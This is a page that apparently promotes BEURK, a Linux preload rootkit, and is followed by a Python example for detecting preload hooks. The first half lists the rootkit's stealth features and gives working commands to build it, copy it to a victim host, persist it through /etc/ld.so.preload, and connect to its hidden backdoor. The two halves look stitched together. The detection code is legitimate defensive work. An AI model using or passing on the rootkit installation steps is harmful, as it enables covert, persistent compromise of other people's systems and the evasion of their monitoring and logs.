BEURK - Experimental Unix RootKit

21.08.2017

RootKit


BEURK is a userland preload rootkit for GNU/Linux, heavily focused on anti-debugging and anti-detection features, according to N0where.net.

Features

  • Hide attacker files and directories
  • Realtime log cleanup (on utmp/wtmp)
  • Anti process and login detection
  • Bypass unhide, lsof, ps, ldd, netstat analysis
  • Furtive PTY backdoor client

Upcoming features

  • ptrace(2) hooking for anti-debugging
  • libpcap hooking undermines local sniffers
  • PAM backdoor for local privilege escalation

Usage

  • Compile

git clone https://github.com/unix-thrust/beurk.git

cd beurk

make

  • Install

scp libselinux.so [email protected]:/lib/

ssh [email protected] 'echo /lib/libselinux.so >> /etc/ld.so.preload'

  • Done!

./client.py victim_ip:port # connect with furtive backdoor

Dependencies

The following packages are not currently required to build BEURK:

  • libpcap – to avoid local sniffing
  • libpam – for local PAM backdoor
  • libssl – for encrypted backdoor connection

Example on Debian:

apt-get install libpcap-dev libpam-dev libssl-dev

Installing BEURK

su -

git clone [email protected]:unix-thrust/beurk.git

cd beurk

./build beurk.conf

mv libselinux.so /lib

echo "/lib/libselinux.so" > /etc/ld.so.preload
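The two installation procedures above persist the rootkit through /etc/ld.so.preload and rely on hooking libc so that readdir-based tools (ls, ps, lsof) no longer see the attacker's files. A defender can check both points from Python: list the preload entries, and compare the libc view of a directory with a raw getdents64(2) view, which a userland preload hook cannot intercept. This is an added detection example, not BEURK's own code; it assumes Linux on x86_64 or aarch64 (the syscall numbers in the code) and CPython's os.listdir going through libc readdir.

```python
import ctypes
import os
import platform
import struct
import tempfile

# getdents64 syscall numbers (assumption: only these two architectures are handled)
SYS_GETDENTS64 = {"x86_64": 217, "aarch64": 61}
libc = ctypes.CDLL(None, use_errno=True)
libc.syscall.restype = ctypes.c_long


def preload_entries(path: str = "/etc/ld.so.preload") -> list[str]:
    """Libraries forced into every dynamically linked process; [] when the file is absent."""
    try:
        with open(path) as f:
            return [tok for line in f for tok in line.split()]
    except FileNotFoundError:
        return []


def raw_listdir(path: str) -> set[str]:
    """Enumerate a directory with getdents64 directly, bypassing libc readdir hooks."""
    nr = SYS_GETDENTS64.get(platform.machine())
    if nr is None:
        raise NotImplementedError(f"no getdents64 number known for {platform.machine()}")
    fd = os.open(path, os.O_RDONLY | os.O_DIRECTORY)
    buf = ctypes.create_string_buffer(64 * 1024)
    names: set[str] = set()
    try:
        while True:
            n = libc.syscall(ctypes.c_long(nr), ctypes.c_int(fd), buf, ctypes.c_size_t(len(buf)))
            if n < 0:
                raise OSError(ctypes.get_errno(), "getdents64 failed")
            if n == 0:
                break
            data, off = buf.raw[:n], 0
            while off < n:
                # struct linux_dirent64: u64 d_ino, s64 d_off, u16 d_reclen, u8 d_type, char d_name[]
                reclen = struct.unpack_from("<H", data, off + 16)[0]
                name = data[off + 19:off + reclen].split(b"\0", 1)[0]
                if name not in (b".", b".."):
                    names.add(name.decode(errors="surrogateescape"))
                off += reclen
    finally:
        os.close(fd)
    return names


def hidden_entries(path: str) -> set[str]:
    """Names the kernel reports for `path` that the libc view omits: a readdir-hook indicator."""
    return raw_listdir(path) - set(os.listdir(path))


def self_check() -> tuple[set[str], set[str]]:
    """Build a constructed sample directory and return (hidden, raw) views of it."""
    with tempfile.TemporaryDirectory() as d:
        for name in ("sample.txt", ".hidden_sample"):
            open(os.path.join(d, name), "w").close()
        return hidden_entries(d), raw_listdir(d)
```

On a clean host `preload_entries()` is empty and `hidden_entries("/lib")` is an empty set; any preload entry, or any name present only in the raw view, is worth investigating.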
